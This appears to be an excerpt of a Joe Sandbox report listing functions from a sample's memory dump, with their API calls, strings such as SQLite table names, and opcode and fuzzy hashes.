Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: 7056f995e2011e928ae7102999403c56b2c87008616075db71ac6bf36d78ee78
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: DD112BB5F042015BF7149B659D00B9BB395AF9534CF144234F90AAB780FB61E918C29E

Function 6C6BCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6BD086
PR_Malloc.NSS3(00000001), ref: 6C6BD0B9
PR_Free.NSS3(?), ref: 6C6BD138

Strings

>, xrefs: 6C6BCF5B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 2658ba760eb3cff6b280ae6aad08cde1fd60834b559732f38acce713ee374c0e
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 6DD16B62B455464FEB14487C8CA13EA77938783378F584329D522BFBE9E6398963C30D

Function 6C53AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C53AE9F
winUnlock, xrefs: 6C53AE18
pkl, xrefs: 6C53ADA7
0kl, xrefs: 6C53ACC0, 6C53AD22, 6C53AD5E, 6C53AE45
Pkl, xrefs: 6C53ADDB, 6C53ADF5, 6C53AE6A

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: 0kl$Pkl$pkl$winUnlock$winUnlockReadLock
API String ID: 0-1038035488
Opcode ID: 06c13ab2aa3ccb41f2adc8afe4c419d47777d73bb9e0f8ebfdbada887a471ce1
Instruction ID: 5775207ee16f2230e1c0e9469c70794fec81b291a3367507c2da9b04438bddd2
Opcode Fuzzy Hash: 06c13ab2aa3ccb41f2adc8afe4c419d47777d73bb9e0f8ebfdbada887a471ce1
Instruction Fuzzy Hash: 0E7190706083049FDB04CF29E884AAABBF5FF89314F14CA1DF95997241EB30A985CBD5

Function 6C65AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eef25017dea92f9550db25b3d550aed64f83ef58ed5688878378f456d7e591
Instruction ID: 3230890c44d72cdefa34e3057c0e8407022c3448d3ad690b0883e5031226e106
Opcode Fuzzy Hash: b6eef25017dea92f9550db25b3d550aed64f83ef58ed5688878378f456d7e591
Instruction Fuzzy Hash: 29F114B1F012158FDB04CF29D8843A97BF2AB8A308F65423DC921D7754EB749961CBD9

Function 6C64DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C525001,?,00000003,00000000), ref: 6C64DFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C525001,?), ref: 6C64E2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C525001,?), ref: 6C64E2DA

Strings

W, xrefs: 6C64E111

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: 0828136bd935ed5acb986ec4be38e53d9a41afce1a2cce9d6b2b91f6e030e027
Instruction ID: be127f95037556fb8f6f8a21a6514874dc130be69e58ef8d84bff6b3f98b51b3
Opcode Fuzzy Hash: 0828136bd935ed5acb986ec4be38e53d9a41afce1a2cce9d6b2b91f6e030e027
Instruction Fuzzy Hash: 28C11831B48655CBDB05CF2984906EAF7B2BF86308F18C1B9DD699BB41D7319811C7D8

Function 6C610E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C611052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C611086

Strings

h(al, xrefs: 6C610E55, 6C610EC4, 6C610F3A, 6C610FA7
h(al, xrefs: 6C611062, 6C61105D, 6C610F37, 6C611081, 6C611082

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(al$h(al
API String ID: 1297977491-3183079524
Opcode ID: b281ce86477fa6574a759025834ccc30308d8e310c5042e08501f3f136f6609d
Instruction ID: 422d236cccafc4e8e3238253fb335847028e2a16a36e3a760009779801fa1fb0
Opcode Fuzzy Hash: b281ce86477fa6574a759025834ccc30308d8e310c5042e08501f3f136f6609d
Instruction Fuzzy Hash: A9A13C71B0524A9FCF08CF9DC990AEEBBB6BF49315B148129E904A7B00D735AC11CB94

Function 6C534DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C535125
pkl, xrefs: 6C534E1C, 6C534E81, 6C534FDE, 6C535047, 6C5350BB, 6C5351A3, 6C53526C
0kl, xrefs: 6C534EDE, 6C534F82
Pkl, xrefs: 6C535019, 6C5350FA, 6C535157, 6C5351DE, 6C5351F2, 6C53520D, 6C535220, 6C5352A2, 6C5352B5

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: 0kl$Pkl$pkl$winUnlockReadLock
API String ID: 0-3348065622
Opcode ID: 1769cc6396da237c39174d73ca29fa898b6db5af57898173abbc408cc68e80f6
Instruction ID: 5e47a27b7fb717356efd3182682e4e9a2ee606d506ed91a22a2362aa7de41fe6
Opcode Fuzzy Hash: 1769cc6396da237c39174d73ca29fa898b6db5af57898173abbc408cc68e80f6
Instruction Fuzzy Hash: 6EE13CB1A083408FDB04DF29D88865ABBF1FF89304F559A1DF89997351EB30D985CB86

Function 6C536F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

*?[, xrefs: 6C537034, 6C537052, 6C537070
noskipscan*, xrefs: 6C537067
unordered*, xrefs: 6C53702B
sz=[0-9]*, xrefs: 6C537049

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: a472298952581d32543518842fbc35d50cb8e49881f763b09017643bc8a0e094
Instruction ID: 6dc7f3582477dc9050d47e2acbf3a1f80bff12a315f285c67a766c48a831fab3
Opcode Fuzzy Hash: a472298952581d32543518842fbc35d50cb8e49881f763b09017643bc8a0e094
Instruction Fuzzy Hash: 38718C32F042318BEB10CA6DCC8039A77A29F85354F251279C86DABBD5FA759C468BC1

Function 6C553EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_, xrefs: 6C553FAA, 6C554185
sqlite_temp_master, xrefs: 6C55460F
sqlite_master, xrefs: 6C55463F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: b11e366cca99e6c5ab95f33f23d07d21ca1edba0c8fa7cff6b54fe822c57ade6
Instruction ID: eeb1d9a617ac50e7399a8d688a66d47a1b8b3e1c60db0e4f5043df24fb84d703
Opcode Fuzzy Hash: b11e366cca99e6c5ab95f33f23d07d21ca1edba0c8fa7cff6b54fe822c57ade6
Instruction Fuzzy Hash: 5D225935B4C1958FD704CB2588602B67BF2AF46318BE949EAC9E15FE56C722E871C780

Function 6C68BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6C68C0B6

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: a127967ed6535d60e906ab6e81aaf543878379bb7934acb3aea6cfce3485a07e
Instruction ID: a43966d6d4c6095a14928463abcd8d5133854fa6a9d4174bd057386318184269
Opcode Fuzzy Hash: a127967ed6535d60e906ab6e81aaf543878379bb7934acb3aea6cfce3485a07e
Instruction Fuzzy Hash: 1D92A174A05209DFDB05DF64C890BAEBBB2FF88308F244269D512A7B91D735EC46CB64

Function 6C523D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C523EA9

Strings

0, xrefs: 6C523DAB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: e631e44ba51c6bc41ac232d427f100c7d522f6832810af8d58e7a31c69e37d7b
Instruction ID: 8265cb76a751a54a8b4044124b77418a0b6b8c342fba2acf0c68a06269e2584a
Opcode Fuzzy Hash: e631e44ba51c6bc41ac232d427f100c7d522f6832810af8d58e7a31c69e37d7b
Instruction Fuzzy Hash: 93512632E490B98AEB15867D8C603FFBBF99B83314F19432AC9A567AC0D63C454D87D0

Function 6C5CEE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CF019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C5CF0F9

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 330d22ce457fb1dd86d7fdf13087fb973216d1787bd3ed474b99c61d752711d9
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: E9917E75B0161A8BCB14CFA8CC916AEB7F1FF85324F24472DD962A7B80D734A905CB52

Function 6C5F2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C617929), ref: 6C5F2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C617929), ref: 6C5F2FE0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: 88305780621aa28bfd5a1435726c4c0a44372ff9ca421ef631d006e373d795d2
Instruction ID: 2ada49b2db1eb8f806a15a824608426a0d192c802eb9e558259662a47938ec50
Opcode Fuzzy Hash: 88305780621aa28bfd5a1435726c4c0a44372ff9ca421ef631d006e373d795d2
Instruction Fuzzy Hash: 285122B1A049118FE708CE59CC80B6A73B9FB85318F29457AD9299BB01D731ED47CF82

Function 6C5FED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C5FEE3D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 84b2a3b3cdc3e13f63ffb89220fb38be221785c41d86ed0c9efe5e9d35816373
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 4471B072E017018FE718CF59D88066ABBF2AB88304F15862DD96697B91D7B0E942CF91

Function 6C525F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6C526013

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 48203dc2a0160bbb1e653d14772a2fa324b95609641f191c67326967134ff28c
Instruction ID: dc46e630d45c589cbf060c53c93effe2f5cf921f1be3382e65ed353d089764ab
Opcode Fuzzy Hash: 48203dc2a0160bbb1e653d14772a2fa324b95609641f191c67326967134ff28c
Instruction Fuzzy Hash: CBC123B4A053068BDB14CF15CC907AAB7F2AF85318F688168D9A5CBBC5DB39EC41C790

Function 6C6B5E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6C6B5B90: PR_Lock.NSS3(00010000,?,00000000,?,6C59DF9B), ref: 6C6B5B9E
Part of subcall function 6C6B5B90: PR_Unlock.NSS3 ref: 6C6B5BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C6B5E23,6C59E154), ref: 6C6B5EBF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: b13fb44a664ea0489887c371c7159153b34154f829c42734586c46392394d5ee
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: 58519D72E0022A8FDB18CF59C8816AEF7B2FF98314B19456DD815B7745D730A951CBA0

Function 6C66DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed0c72a92fba7f2bd9f9977d7db8b9b49ceebd7d17f98c35464f6a286ee92990
Instruction ID: 7ad03b6a70b1d0e7cf79b1ecf3260bee888a113994c3fa4ba9fd61e9e35a86ac
Opcode Fuzzy Hash: ed0c72a92fba7f2bd9f9977d7db8b9b49ceebd7d17f98c35464f6a286ee92990
Instruction Fuzzy Hash: 7CF16D71A01205CFDB08CF1AD894BAA77B2BF89314F294169D8199FB41DB35EC42CBD6

Function 6C601DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 8e660e0ff4fd199f059cb621230ac1ef12d155a9a9252406f1c2ab61d4642a16
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: 51D15732B096168BDB198E18C9843DE7763AF85328F5D4369DD643B7C6C37A9906C3C4

Function 6C598EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9971269bc88f9968f860935cdaa0261286bf06a6b1318358b0fb892095ec6c53
Instruction ID: e867bfd782a93813b27c6b6ff9b4374be3a5ba31f86e636744f7b91d2f83eb27
Opcode Fuzzy Hash: 9971269bc88f9968f860935cdaa0261286bf06a6b1318358b0fb892095ec6c53
